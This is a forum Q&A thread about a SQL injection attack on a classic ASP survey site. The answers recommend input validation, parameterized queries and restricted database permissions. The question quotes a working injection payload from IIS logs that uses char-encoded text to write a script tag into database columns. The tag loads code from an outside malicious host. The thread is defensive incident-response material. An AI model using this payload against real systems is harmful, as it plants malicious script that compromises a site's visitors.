Attack on ASP site that uses a SQL server database

Question

We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: http://stackoverflow.com/questions/3775964/xss-attack-on-the-asp-net-website.

I found multiple entries in our IIS logs that included the malicious code:

< / title> < script src = http : // google-stats49.info/ur.php >.

Here is an example of the value of the cs-uri-query field for one of the IIS log entries.

surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.

Does anyone have any suggestions on how to prevent this from happening?

Answer 1

That's a SQL injection.

1. Never trust user input. You're taking input and sending it directly to the database
2. Never trust your user input!
3. Check all input against a whitelist of allowed values.
4. For text input make sure everything is escaped

There is tons on this subject: Google is your friend

Answer 2

Also...

1. Use parameterized queries.
2. Get off old classic ASP, which makes it harder to use parameterized queries. Move to .NET, which has easier validation and can restrict values, disallow html input and so on.

Answer 3

I suggest you search for any pages that contain Request.QueryString, since it's most often a GET parameter that isn't being filtered (frequently a value that should be an integer) and liberally use the built-in functions CInt, CLng and IsNumeric to stop the injections in their tracks. It should be quicker than rewriting all of your queries to use parameters or creating stored procedures in SQL Server, though that would be the way to go if you're still busy developing the application. You should also disable EXEC permission for the application's user account in SQL Server.

(Sorry, tried linking the other functions but as a new user I'm only allowed one hyperlink. :-))